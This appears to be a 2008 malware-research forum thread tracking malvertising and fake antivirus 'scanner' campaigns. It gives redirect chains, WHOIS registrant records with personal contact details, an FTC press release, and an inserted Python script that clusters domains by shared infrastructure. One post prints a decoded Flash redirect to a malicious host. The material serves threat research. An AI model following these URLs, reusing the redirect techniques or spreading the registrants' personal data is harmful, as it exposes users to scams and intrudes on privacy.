Full Version: Flash Mystery
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Kimberly
<h4>
WARNING: Sell Your Home
</h4>
A new malvertizement featuring Sell Your Home has been discovered by Sandi.

Banner.
Campaign.
2layerads.net/_stat.gif?src=[*]
<h4>
www.variety.com
</h4>
Caution is advised when visiting www.variety.com due to the possible presence of a malicious banner. The site being under Microsoft-IIS/6.0, a hacked .htaccess file is excluded.
Reference: http://www.google.com/support/forum/p/Webm...6b298&hl=en

proweb-info.com was first spotted on Dec 7 2008 and is currently redirecting to pro-antivirus-scan.com/2009/1/en/freescan.php?id=[*]
______________________________

pro-antivirus-scan.com - 91.203.93.68

IP Location - Ukraine - Pool For Co-location Customers
Updated Date: 09-dec-2008
Creation Date: 05-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.FREEYOURDNS.COM
Name Server: NS2.FREEYOURDNS.COM
Name Server: NS3.FREEYOURDNS.COM

Registrant Contact: Aleksander Kabak onicdomains@yahoo.com
+380935437698 fax: +380935437698
Krasnoarmeiskay 83-34
Kharkov Kharkov 61002
ua
Kimberly
<h4>
The FTC goes after Innovative Marketing
</h4>
Press release
At the request of the Federal Trade Commission, a U.S. district court has issued a temporary halt to a massive “scareware” scheme, which falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. According to the FTC, the scheme has tricked more than one million consumers into buying computer security products such as WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus. The court also froze the assets of those responsible for the scheme, to preserve the possibility of providing consumers with monetary redress.

According to the FTC’s complaint, the defendants used an elaborate ruse that duped Internet advertising networks and popular Web sites into carrying their advertisements. The defendants falsely claimed that they were placing Internet advertisements on behalf of legitimate companies and organizations. But due to hidden programming code that the defendants inserted into the advertisements, consumers who visited Web sites where these ads were placed did not receive them. Instead, consumers received exploitive advertisements that took them to one of the defendants’ Web sites. These sites would then claim to scan the consumers’ computers for security and privacy issues. The “scans” would find a host of purported problems with the consumers’ computers and urge them to buy the defendants’ computer security products for $39.95 or more. However, the scans were entirely false.

According to the complaint, the two companies charged in the case – Innovative Marketing, Inc. and ByteHosting Internet Services, LLC – operate using a variety of aliases and maintain offices in various countries. Innovative Marketing is a company incorporated in Belize that maintains offices in Kiev, Ukraine. ByteHosting Internet Services is based in Cincinnati, Ohio.

The complaint alleges that these two companies, along with individuals Daniel Sundin, Sam Jain, Marc D’Souza, Kristy Ross, and James Reno, violated the FTC Act by misrepresenting that they conducted scans of consumers’ computers and detected a variety of security or privacy issues, including viruses, spyware, system errors, and pornography. The complaint also names a sixth individual, Maurice D’Souza, as a relief defendant who received proceeds from the scheme.

On December 2, 2008 the FTC requested and received a temporary restraining order from the U.S. District Court for the District of Maryland. Under its terms, the defendants are barred from falsely representing that they have run any type of computer analysis, or that they have detected security or privacy problems on a consumer’s computer. They also are barred from using domain names obtained with false or incomplete information, placing advertisements purportedly on behalf of a third party without that party’s consent, or otherwise attempting to conceal their own identities. The order also mandates that companies hosting the defendants’ Web sites and providing domain-registration services take the necessary steps to keep consumers from accessing these Web sites.

The FTC seeks to permanently bar the defendants from engaging in “scareware” marketing. The FTC also asks the court to order the defendants to provide monetary redress to consumers or otherwise give up their ill-gotten gains.

As part of an ongoing effort to warn the public about the risks posed by scareware and other types of Internet fraud, the FTC has produced a new alert for consumers. To learn more, see the alert “‘Free Security Scan’ Could Cost Time and Money ” at http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt121.shtm.

The Commission vote authorizing the staff to file the complaint against the defendants was 4-0. The complaint was filed on December 2, 2008 in the U.S. District Court for the District of Maryland.

NOTE: The Commission authorizes the filing of a complaint when it has “reason to believe” that the law has been or is being violated, and it appears to the Commission that a proceeding is in the public interest. A complaint is not a finding or ruling that the defendants have actually violated the law.
Complaint here.

FTC Consumer Alert: “Free Security Scan” Could Cost Time and Money
Kimberly
<h4>
WARNING: Best Western
</h4>
A new malvertizement featuring Best Western has been discovered by Sandi - Full details.

Banner.
Campaign.
ab-outstat.net/c/index.php?id=[*]
profitabill.com/?cmpid=[*]
onlinestatsmanager.com/ts/in.cgi?[*]
www.system-scanner.org/l2/index.html?ref_id=[*]
Kimberly
<h4>
www.nobitching.com : .htaccess hack
</h4>
While usually we saw IPs being used in the redirects involving hacked .htaccess files, I ran into a stranger one today. Visiting www.nobitching.com from Google triggered the following redirect:

alamaat.com/video/wmv.php?f=[*]&p=[*]
trusted-liveclicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
antivirus-rapid-scanner.com/360/1/freescan.php?nu=[*]
It's yet unclear whether alamaat.com has itself been a victim of hacking or not, or whether they created that link on purpose.
______________________________

alamaat.com - 84.45.20.113

IP Location - United Kingdom - Freezone-net
Updated Date: 14-feb-2008
Creation Date: 09-feb-2007
Registrar: ENOM, INC.
Name Server: NS0.FREEZONE.CO.UK
Name Server: NS1.FREEZONE.CO.UK
Administrative Contact:
alamaat.com
usman ahmed (usman438@yahoo.com)
+92.3218484830
Fax: none
180-j johar town
lahore, pu 54500
PK
______________________________

trusted-liveclicks.com - 78.46.101.234

IP Location - Germany - Hetzner
Updated Date: 10-dec-2008
Creation Date: 05-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Aleksander Kabak onicdomains@yahoo.com
+380935437698 fax: +380935437698
Krasnoarmeiskay 83-34
Kharkov Kharkov 61002
ua
______________________________

antivirus-rapid-scanner.com - 91.203.93.68

IP Location - Ukraine - Pool For Co-location Customers
Updated Date: 10-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Oleg Konovalov onicdomains@yahoo.com
+380935439965 fax: +380935439965
Sovetskay 98-56
Kharkov Kharkov 61003
ua
Kimberly
<h4>
www.startribune.com
</h4>
Redirects have been reported at StarTribune, the last one a couple of hours ago. Extreme caution is advised upon visiting the site.
<h4>
noway-clicks.com - protection-fast-scanner.com - protected-clicks-system.com - protectionfastscanner.com
</h4>
noway-clicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
protection-fast-scanner.com/360/1/en/freescan.php?sid=[*]

protected-clicks-system.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
protection-fast-scanner.com/360/1/en/freescan.php?sid=[*]
noway-clicks.com - 69.10.49.195

Innovation IT Solutions Corp
Updated Date: 10-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Oleg Konovalov onicdomains@yahoo.com
+380935439965 fax: +380935439965
Sovetskay 98-56
Kharkov Kharkov 61003
ua
______________________________

protection-fast-scanner.com - 64.20.38.90 / 69.10.44.207

Updated Date: 10-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM
______________________________

protected-clicks-system.com - 78.46.101.234

Updated Date: 10-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Oleg Konovalov onicdomains@yahoo.com
+380935439965 fax: +380935439965
Sovetskay 98-56
Kharkov Kharkov 61003
ua
______________________________

protectionfastscanner.com - 78.47.248.118 / 78.159.114.116 / 78.159.118.144 / 94.247.2.11 / 94.247.2.231

Updated Date: 10-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Oleg Konovalov onicdomains@yahoo.com
+380935439965 fax: +380935439965
Sovetskay 98-56
Kharkov Kharkov 61003
ua

<h4>
Name Servers
</h4>
Seeing NS1.MANAGEHOSTDNS.COM & co reminds me of the former managedns1.estboxes.com, managedns2.estboxes.com ... don't ask me why.
NS1.MANAGEHOSTDNS.COM - 94.247.2.225 - AS12553 PCEXPRESS-AS "DATORU EXPRESS SERVISS" Ltd.
NS2.MANAGEHOSTDNS.COM - 91.203.92.47 - AS44997 BTG12-AS UATELECOM LLC
NS3.MANAGEHOSTDNS.COM - 64.86.17.44 - AS30407 VELCOM .com

managehostdns.com

Updated Date: 11-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.

Registrant Contact:
Privat person
Vladimir Loginov onicdomains@yahoo.com
+380935439965 fax: +380935439965
Kosmonavtov 19-34
Kharkov Kharkov 61003
ua

ns1.freeyourdns.com 213.180.204.8 AS13238 Yandex LLC
ns2.freeyourdns.com 91.203.92.47 - AS44997 BTG12-AS UATELECOM LLC
ns3.freeyourdns.com 64.86.17.44 - AS30407 VELCOM .com
______________________________

ns1.managehostdns.com

hostnames sharing ip with a-records
  1. hs.2-225.zlkon.lv
domains using this as nameserver
  1. protectionfastscanner.com
ns2.managehostdns.com

hostnames sharing ip with a-records
  1. advancedscanner.com
  2. liveupdateservice.cn
  3. ns1.freefastdns.com
  4. ns1.mysecuritysupport.com
  5. ns2.freeyourdns.com
  6. protectiononlineinfo.com
  7. travelmaxinside.cn
domains using this as nameserver
  1. advanced-scan.com
  2. advancedproscan.com
  3. advancedscanner.com
  4. anti-virusquickscan.com
  5. anti-virusrapid-scanner.com
  6. antivirus-pro-scanner.com
  7. antivirus-rapid-scanner.com
  8. antivirus360-protection.com
  9. antivirusbestscanner.com
  10. antivirusfastscan.com
  11. antivirusrapid-scanner.com
  12. bonus-protection.com
  13. bulkwatcher.com
  14. clicksoverview.com
  15. computerquickscanner.com
  16. defence-live-scan.com
  17. digipayments-soft.com
  18. freeyourdns.com
  19. full-pc-scan.com
  20. globalskytransfer.com
  21. infoclicknow.com
  22. informationgohere.com
  23. infowwwpro.com
  24. litetds.info
  25. live-secutiry-update.com
  26. livepc-update.com
  27. ltraffic.cc
  28. managehostdns.com
  29. official-antivirus2009.com
  30. online-info-clicks.com
  31. orbitalclicks.com
  32. overviewclicks.com
  33. paymentdetalization.com
  34. pc-defence-update.com
  35. privateinfoclick.com
  36. privatewebsphere.com
  37. pro-anti-virus-scan.com
  38. pro-antivirus-scan.com
  39. pro-antivirusscanner.com
  40. proinfowww.com
  41. prooverview.com
  42. protection-freescan.com
  43. protection-live-update.com
  44. protectionfastscanner.com
  45. protectionquickscan.com
  46. protectionsoftwaredownload.com
  47. protectmypcnow1.com
  48. proweb-info.com
  49. quickscanpc.com
  50. realtimeweb1.com
  51. safeinternetzone.com
  52. securedclickhere.com
  53. secureddownloadserver.com
  54. securedsoftwaredownload.com
  55. securedupdatedownloads.com
  56. secureupdateserver.com
  57. securityfullscan.com
  58. slickoverview.com
  59. software-clicks.com
  60. softwareclicks2.com
  61. softwareclicks3.com
  62. supportdeska.com
  63. systemmailsupport.com
  64. tdsdefence.info
  65. total-antivirus-scan.com
  66. transferallsource.com
  67. trustedlive-clicks.com
  68. trustedpurchasing.com
  69. updateyourprotection.com
  70. viewallclicks.com
  71. viewyourclicks.com
  72. windowslovingyou.com
  73. winupdates-server.com
  74. world-click-service.com
  75. world-web-info.com
  76. world-web-service.com
  77. wwwinfoclick.com
  78. xpsoftupgrade.com
ns3.managehostdns.com

hostnames sharing ip with a-records
  1. ns2.freefastdns.com
  2. ns3.freeyourdns.com
  3. webscannertools.com
domains using this as nameserver
  1. freeyourdns.com
  2. and see ns2.managehostdns.com
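The pivot done by hand in the post above (one registrant e-mail and one set of nameservers tying dozens of scanner domains together) can be automated. The following is an added example, not code from the thread or from any tool it names: it clusters domains that share a hosting IP, a nameserver or a registrant e-mail with a union-find pass, using records constructed from values quoted in this thread. Nameservers of large shared DNS providers are excluded from the nameserver pivot, because two unrelated customers of such a provider share them too; the suffix list and the record layout are assumptions of this example.

```python
from collections import defaultdict

# Constructed sample records built from values quoted in this thread.
# None stands for a privacy-protected or unknown field.
RECORDS = [
    {"domain": "pro-antivirus-scan.com", "ip": "91.203.93.68",
     "ns": ["NS1.FREEYOURDNS.COM"], "email": "onicdomains@yahoo.com"},
    {"domain": "trusted-liveclicks.com", "ip": "78.46.101.234",
     "ns": ["NS1.MANAGEHOSTDNS.COM"], "email": "onicdomains@yahoo.com"},
    {"domain": "antivirus-rapid-scanner.com", "ip": "91.203.93.68",
     "ns": ["NS1.MANAGEHOSTDNS.COM"], "email": "onicdomains@yahoo.com"},
    {"domain": "protectedgoclicks.com", "ip": "89.149.197.248",
     "ns": ["NS1.MANAGEHOSTDNS.COM"], "email": "tvdomains@lycos.com"},
    {"domain": "onlinecounter2.net", "ip": "92.48.201.39",
     "ns": ["NS1.EVERYDNS.NET"], "email": "viktorbratikov@gmail.com"},
    {"domain": "alamaat.com", "ip": "84.45.20.113",
     "ns": ["NS0.FREEZONE.CO.UK"], "email": "usman438@yahoo.com"},
]

# Nameservers of large shared DNS providers (assumed list): two domains using
# them have nothing in common, so they are ignored when pivoting on nameservers.
SHARED_NS_SUFFIXES = (".everydns.net",)
ALL_PIVOTS = ("ip", "ns", "email")


def indicators(rec, pivot_on=ALL_PIVOTS):
    """Yield the (kind, value) pairs of a record that may be shared with others."""
    if "ip" in pivot_on and rec.get("ip"):
        yield ("ip", rec["ip"])
    if "ns" in pivot_on:
        for ns in rec.get("ns", []):
            ns = ns.lower()
            if not ns.endswith(SHARED_NS_SUFFIXES):
                yield ("ns", ns)
    if "email" in pivot_on and rec.get("email"):
        yield ("email", rec["email"].lower())


def cluster(records, pivot_on=ALL_PIVOTS):
    """Union-find over domains that share at least one indicator.
    Returns the clusters as sorted lists of domains, largest cluster first."""
    parent = {r["domain"]: r["domain"] for r in records}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    first_seen = {}  # indicator -> first domain it was observed on
    for rec in records:
        for ind in indicators(rec, pivot_on):
            if ind in first_seen:
                parent[find(rec["domain"])] = find(first_seen[ind])
            else:
                first_seen[ind] = rec["domain"]

    groups = defaultdict(list)
    for domain in parent:
        groups[find(domain)].append(domain)
    return sorted((sorted(g) for g in groups.values()), key=lambda g: (-len(g), g))


def shared_indicators(records, a, b, pivot_on=ALL_PIVOTS):
    """Direct overlap between two domains; empty when they are only linked
    transitively through a third domain."""
    by_name = {r["domain"]: r for r in records}
    return sorted(set(indicators(by_name[a], pivot_on)) & set(indicators(by_name[b], pivot_on)))


if __name__ == "__main__":
    for group in cluster(RECORDS):
        print(len(group), group)
```

Restricting `pivot_on` to a single indicator kind shows how much each pivot contributes: the hosting IP alone only ties the two domains on 91.203.93.68 together, while the registrant e-mail and the managehostdns.com nameservers are what pull the whole set into one cluster.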
Kimberly
<h4>
WARNING: www.startribune.com - ETRADE
</h4>
Earlier today I did mention the presence of a malicious banner on www.startribune.com. The malvertizement in question features Etrade (which we did encounter in the past). Both the 300x250 and 728x90 versions are being displayed.

Screenshot in situ with the 728x90 version.
Banner.
adserver.adtechde.net/adiframe|3.0|24|57983741|4|1|ADTECH;loc=700;grp=sttr/ETrade_728x90.swf
adserver.adtechde.net/adiframe|3.0|24|57983741|4|1|ADTECH;loc=700;grp=sttr/ETrade_300x250.swf
Campaign.
adclickmate.net/_stat.gif?src=[*]
Both campaigns carry the same link. The 300x250 version was the first being displayed. We notice a request at DoubleClick advertising to adserver.adtechde.net. The "construction of the URL" reminds us of the malvertizement spotted on Fox News on Nov 15 2008.
At adserver.adtechde.net we are redirected to adserver.adtechde.net/.../sttretrade300.html. That page contains some very interesting elements and proves to us again that the bad guys are lazy but nonetheless get away with just about anything.
Etrade advertisement, with a www.imin.com clicktag and a biotrainer ID, added to the fact that our cookie on the PC states adserver.adtechie.net ... No doubt possible: we are in the presence of the same guys who set up adserver.adtechie.net - Ref here and here. I can't stress enough ... an in-depth investigation is required when accepting advertisements from unknown and/or new sources! As seen above, no one is immune.

A closer look at the malicious banners reveals the use of dynamic text. No FuseKit here, but random named similar procedures in order to decode the obfuscated URL.
<h4>
IP details
</h4>
adserver.adtechde.net - 84.16.229.240

Updated Date: 20-nov-2008
Creation Date: 18-nov-2008 <--- 3 days after we did discover adserver.adtechie.net
Domain Name: ADTECHDE.NET
Registrar: INTERNET.BS CORP.
Name Server: NS1.ADTECHDE.NET
Name Server: NS2.ADTECHDE.NET

Registrant
Private Whois Service
*******PLEASE DO NOT SEND LETTERS******
****Contact the owner by email only****
c/o adtechde.net
N4892 Nassau
Bahamas

Administrative Contact
Private Whois Service
Private Whois Service yys5yve49230f22939d0@d6utpmt4922b61034d0c.privatewhois.net
*******PLEASE DO NOT SEND LETTERS******
****Contact the owner by email only****
c/o adtechde.net
N4892 Nassau
Bahamas
Tel: +1.23456789
______________________________

adclickmate.net - 212.95.37.133

Updated Date: 21-nov-2008
Creation Date: 24-mar-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.ADCLICKMATE.NET
Name Server: NS2.ADCLICKMATE.NET

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Kimberly
<h4>
WARNING: Sell Your Home
</h4>
Another malvertizement featuring Sell Your Home aka International Listings - www.intlistings.com - distributed by adserver.adtechde.net

Banner.
adserver.adtechde.net/adiframe|3.0|125|67983747|4|1|ADTECH;loc=700;grp=oni/onintlist728x90.swf
Campaign.
adclickmate.net/_stat.gif?src=[*]
Kimberly
<h4>
The ai&key to success
</h4>
Subject: Servedad
Danger level: high - 100%
Appearances:
  1. Sep 15 2008 - www.cnbc.com
  2. Sep 24 2008 - spaces.live.com
  3. Dec 8 2008 - encarta.msn.com
Last seen: Treat all content from Servedad with extreme caution
Servedad status: ... ACTIVE ...
______________________________

4 malvertizements, 4 identical "campaigns" except for 1 parameter ... the ai&key - besides some differences in the code to prevent detection but that's off topic in the current analysis.
statscontroller.net/stat.gif?url=http://..../ads/bid=..../.../.../.../ai&key=[snapped by me]

After quickly analysing these malvertizements, what stood out was the date of the last ones ... Sept 16 2008 - or 092208/new in the URL if you prefer ... a very short delay after the first one was "busted".
Kimberly
<h4>
772983.2009dengi.com - movie.swf
</h4>
Another social engineering trick involving Flash. A GIF image mimics a player; hovering over the image shows us a link to movie.swf.
Clicking on the image in order to load the "so called" movie, brings us to Antivirus 360.
The analysis of movie.swf reveals the use of getURL, JavaScript and Escaped text.
Decoded:
CODE
window.location = "//m08b.com/in.cgi?default";
Redirects.
m08b.com/in.cgi?default
protectedgoclicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
antivirus-online-proscan.com/360/1/en/freescan.php?sid=[*]
BTW ... If you refrained from clicking on the movie, don't follow the links further down on the same page either; they redirect to randomly generated URLs and from there back to m08b.com. Another redirect at m08b.com will lead the victim to another fake player. This time clicking will trigger the download of a fake codec.
File TubePlayer_1_.ver.6.exe received on 12.15.2008 20:15:00 (CET)

Result: 2/38 (5.27%)

Microsoft 1.4205 2008.12.15 TrojanDownloader:Win32/Renos.FH
Symantec 10 2008.12.15 Downloader

File size: 49156 bytes
MD5...: 61d02d92f3d125051bb91affcff18a6d
SHA1..: 2972fb29ea425bf996fdc6aa4bfd4f2498dc3f41
<h4>
IP details
</h4>
772983.2009dengi.com - 64.27.5.44

IP Location - California - Los Angeles - Airlinereservations.com Inc
Updated Date: 10-dec-2008
Creation Date: 10-dec-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.REG.RU
Name Server: NS2.REG.RU

Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.
Contact: +7.4955140574

Registrant: PrivacyProtect.org
______________________________

m08b.com - 84.16.251.238

Updated Date: 28-sep-2008
Creation Date: 30-jul-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.M08B.COM
Name Server: NS2.M08B.COM

Registrant: Balabass LTD
Max Maximus (balabass@gmail.com)
Pohoronnaya str. 5
Purgen
0,630862
IN
Tel. +383.55379375
______________________________

protectedgoclicks.com - 89.149.197.248

IP Location - Germany - Netdirekt E.k
Updated Date: 14-dec-2008
Creation Date: 14-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Pavel Kovalev - tvdomains@lycos.com
+74956541623 fax: +74956541623
ul. Sadovay 17-32
Moskva Moskovskay oblast 114365
ru
______________________________

antivirus-online-proscan.com - 89.149.197.248

IP Location - Germany - Netdirekt E.k
Updated Date: 14-dec-2008
Creation Date: 14-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Oleg Sobolev tvdomains@lycos.com
+74956541265 fax: +74956541265
ul. St. Razina 67-93
Moskva Moskovskay oblast 113965
ru
______________________________

mybestpov-tube.com - 69.59.21.247

Updated Date: 12-dec-2008
Creation Date: 12-dec-2008
Registrar: REGTIME LTD.
Name Server: NS1.MYBESTPOV-TUBE.COM
Name Server: NS2.MYBESTPOV-TUBE.COM

Registrant: Washington Robin
Email: robinwfwatkins@gmail.com
Organization: Private person
Address: 4695 Monroe Avenue
City: Palmetto
State: PA
ZIP: 34221
Country: US
Phone: +7.9417220595
______________________________

downloadallsoftnow.com - 94.247.3.228

Updated Date: 12-dec-2008
Creation Date: 12-dec-2008
Registrar: REGTIME LTD.
Name Server: NS1.DOWNLOADALLSOFTNOW.COM
Name Server: NS2.DOWNLOADALLSOFTNOW.COM

Registrant: Washington Robin
Email: robinwfwatkins@gmail.com
Organization: Private person
Address: 4695 Monroe Avenue
City: Palmetto
State: PA
ZIP: 34221
Country: US
Phone: +7.9417220595
Kimberly
<h4>
security-www-clicks.com - proantivirusscanner.com - powerantivirusscan.com
</h4>
protected-clicks-system.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
proantivirusscanner.com/2009/1/en/freescan.php?id=[*]

security-www-clicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
powerantivirusscan.com/360/1/en/freescan.php?sid=[*]
security-www-clicks.com - 78.46.216.238

Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 14-dec-2008
Creation Date: 14-dec-2008

Registrant Contact: Pavel Kovalev tvdomains@lycos.com
+74956541623 fax: +74956541623
ul. Sadovay 17-32
Moskva Moskovskay oblast 114365
ru
______________________________

proantivirusscanner.com - 78.26.179.253 / 78.47.248.118 / 78.159.118.144

Registrar: TODAYNIC.COM, INC.
Whois Server: whois.todaynic.com
Referral URL: www.NOW.CN
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM
Status: clientTransferProhibited
Updated Date: 17-dec-2008
Creation Date: 17-dec-2008

Registrant:
Name: Nikolai V Chernikov
Organization: NA
Address: yl. Kravchenko 4 korp. 2 kv.17
City: Moskva
Province/state: NA
Country: RU
Postal Code: 119334
Phone: +7.4952324354
Fax: +7.4952324354
Email: promasteryouth@gmail.com
______________________________

powerantivirusscan.com - 78.26.179.253

Registrar: TODAYNIC.COM, INC.
Whois Server: whois.todaynic.com
Referral URL: www.NOW.CN
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM
Status: clientTransferProhibited
Updated Date: 17-dec-2008
Creation Date: 17-dec-2008

Registrant:
Name: Nikolai V Chernikov
Organization: NA
Address: yl. Kravchenko 4 korp. 2 kv.17
City: Moskva
Province/state: NA
Country: RU
Postal Code: 119334
Phone: +7.4952324354
Fax: +7.4952324354
Email: promasteryouth@gmail.com

ns1.managehostdns.com

antivirus-online-proscan.com | antivirus-rapid-scanner.com | antivirusfastscan.com | managehostdns.com | online-antivirusscanner.com | online-securityscan.com | onlineantivirus-scanner.com | onlinesecurity-scan.com | onlinesecurity-scanner.com | powerantivirusscan.com | proantivirusscanner.com | protectedgoclicks.com | protection-fast-scanner.com | protectionfastscanner.com | security-www-clicks.com | supportsecuritysolutions.com
______________________________

ns2.managehostdns.com

antivirus-online-proscan.com | antivirus-rapid-scanner.com | antivirusfastscan.com | managehostdns.com | online-antivirusscanner.com | online-securityscan.com | onlineantivirus-scanner.com | onlinesecurity-scan.com | onlinesecurity-scanner.com | powerantivirusscan.com | proantivirusscanner.com | protectedgoclicks.com | protection-fast-scanner.com | protectionfastscanner.com | security-www-clicks.com | supportsecuritysolutions.com
______________________________

ns3.managehostdns.com

advancedscanner.com | antivirus-online-proscan.com | antivirus-pro-scanner.com | antivirus-rapid-scanner.com | antivirus-rapidscan.com | antivirus360-protection.com | antivirusbestscanner.com | antivirusfastscan.com | antivirusrapid-scanner.com | bonus-protection.com | computerquickscanner.com | full-pc-scan.com | globalskytransfer.com | informationgohere.com | lead-protection.com | live-secutiry-update.com | livepc-update.com | managehostdns.com | noway-clicks.com | official-antivirus2009.com | online-antivirusscanner.com | online-info-clicks.com | online-securityscan.com | onlineantivirus-scanner.com | onlinesecurity-scan.com | onlinesecurity-scanner.com | orbitalclicks.com | overviewclicks.com | paymentdetalization.com | pc-defence-update.com | powerantivirusscan.com | privateinfoclick.com | pro-anti-virus-scan.com | pro-antivirus-scan.com | pro-antivirusscanner.com | proantivirusscanner.com | proinfowww.com | prooverview.com | protected-clicks-system.com | protectedgoclicks.com | protection-fast-scanner.com | protection-freescan.com | protectionfastscanner.com | protectionsoftwaredownload.com | protectmypcnow1.com | proweb-info.com | quickscanpc.com | realtimeweb1.com | safeinternetzone.com | securedclickhere.com | secureddownloadserver.com | securedsoftwaredownload.com | securedupdatedownloads.com | secureupdateserver.com | security-www-clicks.com | securityfullscan.com | slickoverview.com | software-clicks.com | softwareclicks3.com | supportdeska.com | supportsecuritysolutions.com | systemmailsupport.com | tdsdefence.info | total-antivirus-scan.com | transferallsource.com | trustedlive-clicks.com | trustedpurchasing.com | updateyourprotection.com | viewallclicks.com | viewyourclicks.com | windowslovingyou.com | winupdates-server.com | world-click-service.com | world-web-info.com | world-web-service.com | xpsoftupgrade.com
Kimberly
<h4>
delightfullinternet.com - onlinevirusbuster.com
</h4>
Today I want to draw your attention to another method used to redirect people to fake online scanners - Antivirus 360 or Antivirus 2009 for the time being - which has been going on for quite a while. Search engines are used on a daily basis by everyone, whether it is to find a particular website, information or assistance with common problems. Keywords are the basis for obtaining results, and the bad guys have been using common keywords / sentences to set up a couple of pages of their own sauce.

Illustration.

A person is having problems with his mail account: it refuses to download attachments. A typical query would be Attachment Problems Yahoo Mail, for example. The search engine will return its results, people will start reading pages, and once in a while you will see a couple of links simply containing words, strange domain names as seen below.
Note: the 2 last domains are not resolving at the time of the write up

Clicking on the link will initiate a redirect. This method has nothing in common with the hacked .htaccess files although it produces the same result. To understand how it works we need to examine our referrer header. You will notice it carries our keywords, represented by the q= parameter:
www.google.com/search?hl=en&lr=&as_qdr=w&q=Attachment+Problems+Yahoo+Mail&start=10&sa=N
Upon entering m2areas.com.br (or another similar website) this field is examined and if not empty, we encounter a 302 error which bumps us to the fake online scanner.

Complete redirect.
m2areas.com.br/ejcto/nyabt/attachments/attachments.htm
onlinecounter2.net/s/in.cgi?[*]
onlinecounter2.net/redirect/
delightfullinternet.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
onlinevirusbuster.com/2009/1/freescan.php?nu=[*]
onlinevirusbuster.com/2009/1/en/freescan.php?id=[*]
If the q parameter is empty or when you visit the page directly, no redirect occurs.
The page itself is only a succession of key phrases, commonly used search terms. Indexed by search engines, they will stand out in queries.
Either blocking your referrer headers or taking the time to copy and paste links into a new tab is about the only solution you have against these hijacks. Don’t blindly follow any link returned by your query; examine its content and look at the website address you will be visiting when following the link.

<h4>
IP details
</h4>
onlinecounter2.net - 92.48.201.39

Name Servers: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET - NS3.EVERYDNS.NET - NS4.EVERYDNS.NET
Updated Date: 01-dec-2008
Creation Date: 02-oct-2008

Registration Service Provided By: NKVD.PRO
Contact: +7.9265552367

Registrant: Viktor K Bratikov (viktorbratikov@gmail.com)
ul.Gospitalnyj val, 5/6, 165
Moscow
Moskovskaya oblast,105094
RU
Tel. +7.9039908132
______________________________

delightfullinternet.com - 89.149.227.196

Name Server: NS1.MANAGEHOSTDNS.COM - NS2.MANAGEHOSTDNS.COM - NS3.MANAGEHOSTDNS.COM
Creation Date: 16-dec-2008
Registrar: BIZCN.COM, INC.

Registrant Contact: Sergey Loginov tvdomains@lycos.com
+74956743562 fax: +74956743562
Krasnoarmeiskay 83-34
Moskva Moskovskay oblast 107234
ru
______________________________

onlinevirusbuster.com - 89.149.227.196

Name Server: NS1.MANAGEHOSTDNS.COM - NS2.MANAGEHOSTDNS.COM - NS3.MANAGEHOSTDNS.COM
